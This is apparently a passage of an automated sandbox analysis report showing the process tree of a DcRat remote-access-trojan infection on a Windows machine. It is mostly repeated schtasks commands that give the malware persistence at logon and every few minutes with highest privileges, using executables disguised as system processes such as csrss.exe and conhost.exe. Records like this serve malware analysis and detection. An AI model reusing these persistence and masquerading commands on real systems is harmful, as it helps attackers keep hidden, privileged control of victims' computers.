                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                        4⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:6700
                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5908
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                          4⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          PID:1528
                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5956
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                            4⤵
                                                                                                                                                              PID:6208
                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6984
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                4⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:2952
                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                              3⤵
                                                                                                                                                                PID:6876
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:7020
                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:6928
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:6024
                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1064
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                        4⤵
                                                                                                                                                                        • DcRat
                                                                                                                                                                        PID:2236
                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6736
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                          PID:2148
                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5756
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                            4⤵
                                                                                                                                                                            • DcRat
                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                            PID:5448
                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:3796
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:940
                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6088
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1364
                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:4984
                                                                                                                                                                            • C:\Windows\System32\MsiExec.exe
                                                                                                                                                                              C:\Windows\System32\MsiExec.exe -Embedding 449B985B66CEBC99C779E33793907A43
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:1596
                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 1D273EEB38F7B597AF1971442010E811
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:5048
                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 00076004D7B55F199A3817DC7597ADB6 E Global\MSI0000
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2300
                                                                                                                                                                                • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                                                  "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2168
                                                                                                                                                                                    • C:\Windows\System32\wevtutil.exe
                                                                                                                                                                                      "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:2668
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\SolaraBootstrapper.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3536
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SolaraBootstrapper" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\SolaraBootstrapper.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:2360
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\SolaraBootstrapper.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1604
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files\7-Zip\Lang\spoolsv.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3444
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\spoolsv.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4108
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\spoolsv.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1044
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Favorites\Links\wininit.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3556
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\Favorites\Links\wininit.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:2272
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Favorites\Links\wininit.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:4936
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\Registry.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4356
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\Registry.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:3192
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\Registry.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3900
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4724
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:2936
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:836
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4784
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:408
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:4204
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Windows\Media\Raga\services.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:1336
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\Media\Raga\services.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3232
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Windows\Media\Raga\services.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4300
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\csrss.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4652
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4836
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:2580
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Google\dllhost.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4832
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Google\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:2260
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Google\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1272
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Music\System.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:2752
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Public\Music\System.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:3972
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Music\System.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1752
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3216
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:2976
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4808
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4392
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:1244
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:4816
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\SolaraBootstrapper.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3840
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SolaraBootstrapper" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\SolaraBootstrapper.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3988
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\SolaraBootstrapper.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4132
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemResources\Windows.UI.SettingsHandlers-nt\pris\msiexec.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1452
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.SettingsHandlers-nt\pris\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1632
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 12 /tr "'C:\Windows\SystemResources\Windows.UI.SettingsHandlers-nt\pris\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3624
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 7 /tr "'C:\winNet\wscript.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4952
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1104
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1308
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\conhost.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1604
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:2760
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1576
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 11 /tr "'C:\winNet\msiexec.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:1044
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\winNet\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
